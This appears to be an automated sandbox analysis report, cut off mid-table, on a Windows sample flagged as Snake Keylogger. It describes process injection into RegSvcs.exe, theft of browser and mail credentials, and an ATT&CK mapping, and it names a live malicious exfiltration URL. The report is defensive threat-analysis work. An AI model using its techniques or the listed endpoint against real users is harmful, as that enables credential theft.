Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E09D5 SetUnhandledExceptionFilter,	6_2_002E09D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_002E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_002E0C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 25D008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 60F008			Jump to behavior

Source: C:\Users\user\Desktop\PsBygexGwH.exe

0_2_00181201

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_00162BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00162BA5

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0018B226 SendInput,keybd_event,

0_2_0018B226

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001A22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_001A22DA

Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PsBygexGwH.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PsBygexGwH.exe

0_2_00180B62

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_00181663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00181663

Source: PsBygexGwH.exe, name.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PsBygexGwH.exe, name.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_00140698 cpuid

0_2_00140698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_00198195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00198195

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0017D27A GetUserNameW,

0_2_0017D27A

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_0015BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0015BB6F

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Code function: 0_2_001242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001242DE

Source: C:\Users\user\Desktop\PsBygexGwH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3844, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3844, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.name.exe.40c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.3910000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.name.exe.3910000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.name.exe.40c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: name.exe PID: 3052, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: name.exe PID: 4556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 3844, type: MEMORYSTR

Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001A1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_001A1204
Source: C:\Users\user\Desktop\PsBygexGwH.exe	Code function: 0_2_001A1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_001A1806
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00341204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	6_2_00341204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_00341806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	6_2_00341806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	27 System Information Discovery	Distributed Component Object Model	21 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PsBygexGwH.exe	66%	ReversingLabs	Win32.Trojan.Strab
PsBygexGwH.exe	70%	Virustotal		Browse
PsBygexGwH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\troopwise	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\troopwise	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
reallyfreegeoip.org	1%	Virustotal	Browse
scratchdreams.tk	6%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231$	0%	Avira URL Cloud	safe
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
http://scratchdreams.tk	100%	Avira URL Cloud	malware
http://checkip.dyndns.com(	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/102.129.152.231	0%	Avira URL Cloud	safe
https://scratchdreams.tk	15%	Virustotal		Browse
http://scratchdreams.tk	6%	Virustotal		Browse
https://scratchdreams.tk/_send_.php?TS	14%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
reallyfreegeoip.org	172.67.177.134	true	false	1%, Virustotal, Browse	unknown
scratchdreams.tk	104.21.27.85	true	false	6%, Virustotal, Browse	unknown
checkip.dyndns.com	158.101.44.242	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/102.129.152.231	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.com(	RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://checkip.dyndns.org/q	name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://scratchdreams.tk	name.exe, 00000006.00000002.3000550046.0000000003910000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4087333000.0000000000579000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000270E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002551000.00000004.00000800.00020000.00000000.sdmp, name.exe, 00000009.00000002.3132403905.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002620000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.000000000264B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026D2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000025FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028AF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000295C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.000000000294A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029A4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002969000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002985000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	RegSvcs.exe, 00000007.00000002.4088699250.000000000269B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026B7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002608000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4088699250.00000000026A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4089048869.0000000002977000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 